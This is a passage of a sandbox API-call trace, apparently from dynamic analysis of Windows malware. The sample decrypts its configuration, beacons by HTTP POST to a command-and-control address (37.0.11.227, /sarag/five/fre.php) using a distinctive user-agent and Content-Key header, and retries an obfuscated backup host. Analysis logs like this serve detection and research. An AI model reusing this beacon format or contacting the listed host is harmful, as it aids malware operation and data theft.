Size=0x40) returned 0x6a4730 [0224.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.242] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0224.247] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.247] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0224.253] GetProcessHeap () returned 0x690000 [0224.253] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0224.254] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.254] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0224.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.255] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0224.256] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.256] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0224.256] GetProcessHeap () returned 0x690000 [0224.257] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0224.258] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.258] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0224.259] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.261] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0224.261] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.262] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0224.262] GetProcessHeap () returned 0x690000 [0224.262] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0224.262] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0224.262] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0224.263] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0224.263] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0224.264] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0224.264] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0224.265] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0224.265] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0224.265] GetProcessHeap () returned 0x690000 [0224.265] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0224.265] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0224.265] GetProcessHeap () returned 0x690000 [0224.265] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab330 [0224.265] socket (af=2, type=1, protocol=6) returned 0x59c [0224.266] connect (s=0x59c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0224.298] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0224.298] GetProcessHeap () returned 0x690000 [0224.298] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0224.298] GetProcessHeap () returned 0x690000 [0224.298] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0224.299] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0224.303] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0224.303] GetProcessHeap () returned 0x690000 [0224.303] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afb00 [0224.303] GetProcessHeap () returned 0x690000 [0224.304] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0224.304] GetProcessHeap () returned 0x690000 [0224.304] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0224.304] GetProcessHeap () returned 0x690000 [0224.304] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0224.305] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0224.306] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0224.306] GetProcessHeap () returned 0x690000 [0224.306] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0224.306] GetProcessHeap () returned 0x690000 [0224.306] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0224.307] send (s=0x59c, buf=0x6ad508*, len=242, flags=0) returned 242 [0224.307] send (s=0x59c, buf=0x6aba40*, len=159, flags=0) returned 159 [0224.307] GetProcessHeap () returned 0x690000 [0224.307] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0224.307] recv (in: s=0x59c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0224.382] GetProcessHeap () returned 0x690000 [0224.382] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0224.382] GetProcessHeap () returned 0x690000 [0224.383] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0224.384] GetProcessHeap () returned 0x690000 [0224.384] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afb00 | out: hHeap=0x690000) returned 1 [0224.384] GetProcessHeap () returned 0x690000 [0224.384] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0224.385] closesocket (s=0x59c) returned 0 [0224.385] GetProcessHeap () returned 0x690000 [0224.385] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab330 | out: hHeap=0x690000) returned 1 [0224.385] GetProcessHeap () returned 0x690000 [0224.386] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0224.386] GetProcessHeap () returned 0x690000 [0224.386] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0224.386] GetProcessHeap () returned 0x690000 [0224.386] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0224.386] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1324) returned 0x59c [0224.391] Sleep (dwMilliseconds=0xea60) [0224.392] GetProcessHeap () returned 0x690000 [0224.392] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0224.393] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.394] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0224.399] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.400] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0224.407] GetProcessHeap () returned 0x690000 [0224.407] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0224.407] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.408] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0224.409] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.409] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0224.410] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.413] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0224.413] GetProcessHeap () returned 0x690000 [0224.414] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0224.415] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.415] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0224.416] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.416] CryptDestroyKey (hKey=0x69d628) returned 1 [0224.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.417] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0224.417] GetProcessHeap () returned 0x690000 [0224.417] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0224.418] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0224.419] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0224.419] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0224.420] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0224.427] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0224.427] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0224.428] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0224.428] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0224.429] GetProcessHeap () returned 0x690000 [0224.429] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0224.429] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0224.429] GetProcessHeap () returned 0x690000 [0224.429] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0224.429] GetProcessHeap () returned 0x690000 [0224.430] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0224.430] GetProcessHeap () returned 0x690000 [0224.430] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0224.430] GetProcessHeap () returned 0x690000 [0224.430] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0224.431] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.431] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0224.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.439] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0224.446] GetProcessHeap () returned 0x690000 [0224.446] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0224.447] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.447] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0224.448] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.449] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0224.449] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.450] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0224.450] GetProcessHeap () returned 0x690000 [0224.450] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0224.451] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.452] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0224.453] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.453] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0224.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.454] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0224.454] GetProcessHeap () returned 0x690000 [0224.454] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0224.457] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0224.458] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0224.459] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0224.459] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0224.460] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0224.460] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0224.461] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0224.461] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0224.461] GetProcessHeap () returned 0x690000 [0224.461] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0224.461] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0224.461] GetProcessHeap () returned 0x690000 [0224.461] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab450 [0224.461] socket (af=2, type=1, protocol=6) returned 0x5a0 [0224.462] connect (s=0x5a0, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0224.487] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0224.487] GetProcessHeap () returned 0x690000 [0224.487] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0224.487] GetProcessHeap () returned 0x690000 [0224.487] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0224.490] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0224.491] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0224.491] GetProcessHeap () returned 0x690000 [0224.491] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0040 [0224.491] GetProcessHeap () returned 0x690000 [0224.492] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0224.492] GetProcessHeap () returned 0x690000 [0224.492] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4460 [0224.492] GetProcessHeap () returned 0x690000 [0224.492] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0224.493] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0224.494] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0224.494] GetProcessHeap () returned 0x690000 [0224.494] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0224.494] GetProcessHeap () returned 0x690000 [0224.494] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0224.495] send (s=0x5a0, buf=0x6ad508*, len=242, flags=0) returned 242 [0224.495] send (s=0x5a0, buf=0x6aba40*, len=159, flags=0) returned 159 [0224.495] GetProcessHeap () returned 0x690000 [0224.495] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0224.495] recv (in: s=0x5a0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0224.565] GetProcessHeap () returned 0x690000 [0224.565] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0224.565] GetProcessHeap () returned 0x690000 [0224.566] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0224.567] GetProcessHeap () returned 0x690000 [0224.567] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0040 | out: hHeap=0x690000) returned 1 [0224.567] GetProcessHeap () returned 0x690000 [0224.567] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0224.567] closesocket (s=0x5a0) returned 0 [0224.568] GetProcessHeap () returned 0x690000 [0224.568] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab450 | out: hHeap=0x690000) returned 1 [0224.568] GetProcessHeap () returned 0x690000 [0224.568] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0224.569] GetProcessHeap () returned 0x690000 [0224.569] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0224.569] GetProcessHeap () returned 0x690000 [0224.569] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0224.570] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xae0) returned 0x5a0 [0224.572] Sleep (dwMilliseconds=0xea60) [0224.573] GetProcessHeap () returned 0x690000 [0224.573] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0224.574] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.578] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0224.595] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.596] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0224.607] GetProcessHeap () returned 0x690000 [0224.607] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0224.608] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.608] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0224.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.609] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0224.610] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.610] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0224.610] GetProcessHeap () returned 0x690000 [0224.611] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0224.612] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.613] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0224.643] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.644] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0224.644] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.645] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0224.645] GetProcessHeap () returned 0x690000 [0224.645] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0224.645] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0224.646] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0224.646] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0224.647] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0224.647] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0224.647] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0224.648] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0224.648] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0224.648] GetProcessHeap () returned 0x690000 [0224.648] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0224.648] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0224.649] GetProcessHeap () returned 0x690000 [0224.650] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0224.652] GetProcessHeap () returned 0x690000 [0224.652] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0224.652] GetProcessHeap () returned 0x690000 [0224.653] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0224.653] GetProcessHeap () returned 0x690000 [0224.653] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0224.653] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.654] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0224.665] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.666] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0224.672] GetProcessHeap () returned 0x690000 [0224.672] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0224.672] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.673] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0224.673] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.673] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0224.674] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.674] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0224.674] GetProcessHeap () 